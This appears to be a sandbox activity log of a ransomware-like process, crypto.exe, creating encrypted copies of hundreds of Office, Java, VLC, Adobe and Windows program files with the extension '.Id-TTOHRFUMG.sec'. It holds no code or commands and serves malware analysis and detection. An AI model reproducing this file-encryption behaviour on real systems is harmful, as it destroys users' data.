File created	C:\Program Files\Java\jre7\lib\zi\Atlantic\Canary.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-13.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Default.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ADDINS\ColleagueImport.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\visualization\libprojectm_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\about.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107748.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02282_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Slate.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00443_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\8.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\SCNPST32.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107026.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185670.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16Images.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\INCOMING.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libremap_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\COPYRIGHT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00252_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10301_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115839.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine_2.3.0.v20140506-1720.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baku.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\fonts\LucidaSansRegular.ttf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\rt.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00391_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\J0115876.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\rmid.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ONENOTE_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_snow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CARBN_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR9B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Portable Devices\sqmapi.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0301432.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Recife.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\ED00172_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02278_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR4B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows NT\TableTextService\TableTextServiceSimplifiedQuanPin.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\play_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\javadoc.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00612_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\fonts\LucidaBrightRegular.ttf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yakutsk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00369_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\POSTL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\SessionMember.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\pack200.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_06.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01838_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libwav_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_over.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.TW.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\NAVBRPH1.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\Accessible.tlb.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Indian\Christmas.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Lime\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\plugin-hang-ui.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libparam_eq_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\STSUPLD.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hebron.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\NEWS.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libball_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174639.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02267_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00390_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\ContentDirectory.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceSimplifiedQuanPin.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Civic.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0297749.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18199_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\AdjacencyLetter.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\library.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\lt.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Iqaluit.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00173_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FORM.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Earthy.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\CATALOG.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\VISSHE.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jli.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Chisinau.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.ja_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107300.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\DISTLSTS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\sr-spc.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_nv12_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\hi.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\nb.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewFrame.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Berlin.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\vi.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\POWERPNT.HXS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SMIMES.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\16-on-black.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.RSA.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WHIRL1.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\next_hov.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationUp_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Lime\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\HEADER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14693_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02398U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105530.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0250504.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\203x8subpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\fonts\LucidaBrightDemiItalic.ttf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Whitehorse.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_output\libadummy_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dushanbe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\specialmainsubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01628_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_flac_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libfps_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\bear_formatted_rgb6.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSACCESS.DEV_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR20F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MML2OMML.XSL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GRLEX.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\SystemV\MST7MDT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericonMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\WWLIB.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18253_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14831_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-middle.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Sofia.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14844_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK.DEV_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\TWSTRUCT.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\flyout.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106146.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Tongatapu.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CLASSIC2.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02265_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\Media Renderer\RenderingControl.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02404_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00683_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\EXCEL.DEV_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImageMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Microsoft.SharePoint.BusinessData.Administration.Client.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterBold.ttf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00005_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\ViewHeaderPreview.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_left_mouseout.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\CIEXYZ.pf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21448_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\1.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\wmpnssci.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_m.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_thunderstorm.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationUp_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-convert-l1-1-0.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\settings.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\w2k_lsa_auth.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01157_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSACCESS_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGAD.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\meta\art\01_googleimage.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\LoginForm.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_hail.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator_3.3.300.v20140518-1928.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107496.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Argentina\Tucuman.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_on.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BANNER.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_over.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BCSStr32.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Equity.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Urban.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\VIEW.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\QRCode.pmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api.Id-TTOHRFUMG.sec	crypto.exe
